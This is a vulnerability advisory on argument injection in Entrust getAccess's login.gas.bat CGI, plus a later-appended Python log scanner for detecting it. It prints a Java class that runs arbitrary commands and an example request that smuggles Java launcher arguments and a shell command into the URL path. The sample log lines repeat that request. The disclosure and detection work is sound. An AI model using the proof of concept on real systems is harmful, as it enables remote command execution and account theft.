COMMAND

    Entrust

SYSTEMS AFFECTED

    Entrust

PROBLEM

    "rudi carell" found the following.  getAccess[tm] is a single-sign-on
    system often used for large internet portals.

    Entrust GetAccess[tm] offers  the most comprehensive  solution for
    consistently deploying and  enforcing basic and  enhanced security
    across  online  applications,  from  Web  browsers,  to enterprise
    applications and legacy database systems.

    Due to missing input validation it is possible to run (start) Java
    programs on the "getaccess" machine.  Combined with publicly
    accessible uploads, or any other way to create class files on the
    server, this vulnerability could be used to run arbitrary system
    commands on the target machine (or to change getAccess parameters
    and steal any user account you want, BTW).

    It should also be possible (but not proven yet) to exploit default,
    install or demo classes shipped with Java or getAccess, which would
    make the file-upload (creation) part unneeded!  (uninstall.class is
    very likely an effective DoS.)

    Example (find an exploitable getAccess class [one which accepts
    params!] or upload a "command" program):

        import java.io.*;
        public class cmd {
            public static void main(String args[]) {
                String s = null;   // one line of child-process output
                try {
                    Process p = Runtime.getRuntime().exec(args[0] + " " + args[1]);
                    BufferedReader stdInput = new BufferedReader(new
                        InputStreamReader(p.getInputStream()));
                    BufferedReader stdError = new BufferedReader(new
                        InputStreamReader(p.getErrorStream()));
                    System.out.println("Content-type: text/html\n\n");
                    while ((s = stdInput.readLine()) != null) { System.out.println(s); }
                    while ((s = stdError.readLine()) != null) { System.out.println(s); }
                    System.exit(0);
                }
                catch (IOException e) { e.printStackTrace(); System.exit(-1); }
            }
        }

    Then an HTTP request to:

        http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

    will run "/whereever/cmd.class" and execute "/bin/ls -alsi".
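    As an added illustration (not part of the original advisory), the request shape above can be picked out of web server access logs: any extra path info handed to login.gas.bat is unexpected, and whitespace inside it means extra Java launcher arguments were smuggled in. The log lines are constructed, and the assumption that login.gas.bat is normally called with no path info is the author's, not Entrust's.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines for this example (fictional addresses).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2001:12:00:00 +0000] "GET /sek-bin/login.gas.bat HTTP/1.0" 200 1234
10.0.0.9 - - [01/Jan/2001:12:00:01 +0000] "GET /sek-bin/login.gas.bat/x%20-classpath%20/tmp%20cmd%20/bin/ls%20-alsi HTTP/1.0" 200 512
10.0.0.7 - - [01/Jan/2001:12:00:02 +0000] "GET /sek-bin/login.gas.bat/x%20uninstall HTTP/1.0" 200 77
10.0.0.3 - - [01/Jan/2001:12:00:03 +0000] "GET /sek-bin/login.gas.bat/foo HTTP/1.0" 404 200
10.0.0.2 - - [01/Jan/2001:12:00:04 +0000] "GET /index.html HTTP/1.0" 200 3000
"""

# Target is [^"]+ rather than \S+ so raw (unencoded) spaces in the URL still parse.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>[^"]+) HTTP/[\d.]+"')
GAS_PREFIX = "/sek-bin/login.gas.bat"   # vulnerable CGI path from the advisory

def decode_path(target):
    """Percent-decode the path part of a request target until it stops changing (bounded)."""
    path = target.split("?", 1)[0]
    for _ in range(3):            # double encoding is a common evasion; cap the loop
        new = unquote(path)
        if new == path:
            break
        path = new
    return path

def classify(target):
    """Classify one request target against the getAccess launcher-injection pattern."""
    path = decode_path(target)
    if not path.startswith(GAS_PREFIX):
        return "not-getaccess"
    tail = path[len(GAS_PREFIX):].lstrip("/")
    if tail == "":
        return "normal"                    # assumption: the CGI takes no path info
    if re.search(r"\s", tail):
        return "argument-injection"        # extra launcher args such as -classpath
    return "unexpected-path-info"

def scan_log(text):
    """Return (ip, target, verdict) for every request that is not normal getAccess traffic."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group("target"))
        if verdict in ("argument-injection", "unexpected-path-info"):
            hits.append((m.group("ip"), m.group("target"), verdict))
    return hits

if __name__ == "__main__":
    for ip, target, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:22} {ip:10} {target}")
```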

SOLUTION

    This vulnerability has  been confirmed by  Entrust and a  patch is
    forthcoming.  Detailed information  on this issue has  been posted
    to the  Entrust customer  extranet on  both the  Entrust GetAccess
    Portal and the Entrust Customer Support Extranet:

        https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-001.html
        https://www.entrust.com/support/resources/recentsecuritynotes.htm